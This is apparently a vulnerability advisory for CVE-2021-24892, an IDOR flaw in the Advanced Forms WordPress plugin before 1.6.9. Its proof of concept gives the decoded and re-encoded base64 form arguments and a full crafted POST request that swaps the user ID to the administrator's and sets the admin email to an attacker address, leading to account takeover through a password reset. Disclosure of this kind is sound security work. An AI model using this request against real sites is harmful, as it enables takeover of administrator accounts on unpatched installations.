Advanced Forms < 1.6.9 – Subscriber+ Arbitrary User Email Address Update via IDOR | CVE 2021-24892

Description

Insecure Direct Object Reference in edit function of Advanced Forms (Free & Pro) before 1.6.9 allows authenticated remote attacker to change arbitrary user's email address and request for reset password, which could lead to take over of WordPress's administrator account. To exploit this vulnerability, an attacker must register to obtain a valid WordPress's user and use such user to authenticate with WordPress in order to exploit the vulnerable edit function.

Proof of Concept

- Access to target site and login as normal user (userID 209) to use edit user's information function
- After decode data in "af_form_args" and "_acf_form" parameter from base64 format it looks like JSON data 

		{"display_title":false,"display_description":false,"id":"form_5d37f4523b775","values":[],"submit_text":"Submit","redirect":"https:\/\/victim.com\/","target":"https:\/\/victim.com\/","echo":true,"exclude_fields":[],"uploader":"wp","filter_mode":false,"label_placement":"top","instruction_placement":"label","honeypot":true,"user":209}

this JSON data contain "user" that are Wordpress's userID. 

- The doers could change it to another userID (such as 1, by default is WordPress administrator account) 

		{"display_title":false,"display_description":false,"id":"form_5d37f4523b775","values":[],"submit_text":"Submit","redirect":"https:\/\/victim.com\/","target":"https:\/\/victim.com\/","echo":true,"exclude_fields":[],"uploader":"wp","filter_mode":false,"label_placement":"top","instruction_placement":"label","honeypot":true,"user":1}

- Encode as base64 format and modifying "af_form_args" and "_acf_form" parameter on intercepted proxy before sending it to edit other user's information. In worst case if the target site allows to edit a user's email, the doers could take over user's account by changing email and request for reset password.

POST /account/edit HTTP/1.1

-----------------------------299397949318395902213847433917
	Content-Disposition: form-data; name="af_form_args"

	eyJkaXNwbGF5X3RpdGxlIjpmYWxzZSwiZGlzcGxheV9kZXNjcmlwdGlvbiI6ZmFsc2UsImlkIjoiZm9ybV81ZDM3ZjQ1MjNiNzc1IiwidmFsdWVzIjpbXSwic3VibWl0X3RleHQiOiJTdWJtaXQiLCJyZWRpcmVjdCI6Imh0dHBzOlwvXC92aWN0aW0uY29tXC8iLCJ0YXJnZXQiOiJodHRwczpcL1wvdmljdGltLmNvbVwvIiwiZWNobyI6dHJ1ZSwiZXhjbHVkZV9maWVsZHMiOltdLCJ1cGxvYWRlciI6IndwIiwiZmlsdGVyX21vZGUiOmZhbHNlLCJsYWJlbF9wbGFjZW1lbnQiOiJ0b3AiLCJpbnN0cnVjdGlvbl9wbGFjZW1lbnQiOiJsYWJlbCIsImhvbmV5cG90Ijp0cnVlLCJ1c2VyIjoxfQ==
-----------------------------299397949318395902213847433917
	Content-Disposition: form-data; name="_acf_form"
	
	eyJkaXNwbGF5X3RpdGxlIjpmYWxzZSwiZGlzcGxheV9kZXNjcmlwdGlvbiI6ZmFsc2UsImlkIjoiZm9ybV81ZDM3ZjQ1MjNiNzc1IiwidmFsdWVzIjpbXSwic3VibWl0X3RleHQiOiJTdWJtaXQiLCJyZWRpcmVjdCI6Imh0dHBzOlwvXC92aWN0aW0uY29tXC8iLCJ0YXJnZXQiOiJodHRwczpcL1wvdmljdGltLmNvbVwvIiwiZWNobyI6dHJ1ZSwiZXhjbHVkZV9maWVsZHMiOltdLCJ1cGxvYWRlciI6IndwIiwiZmlsdGVyX21vZGUiOmZhbHNlLCJsYWJlbF9wbGFjZW1lbnQiOiJ0b3AiLCJpbnN0cnVjdGlvbl9wbGFjZW1lbnQiOiJsYWJlbCIsImhvbmV5cG90Ijp0cnVlLCJ1c2VyIjoxfQ==

-----------------------------299397949318395902213847433917
	Content-Disposition: form-data; name="acf[field_abcd]"     			#### for example acf[field_abcd] is for edit email address ####

attacker@mail.com


- When requesting for reset password it will send URL for set new password to attacker@mail.com lead to Wordpress's administrator account takeover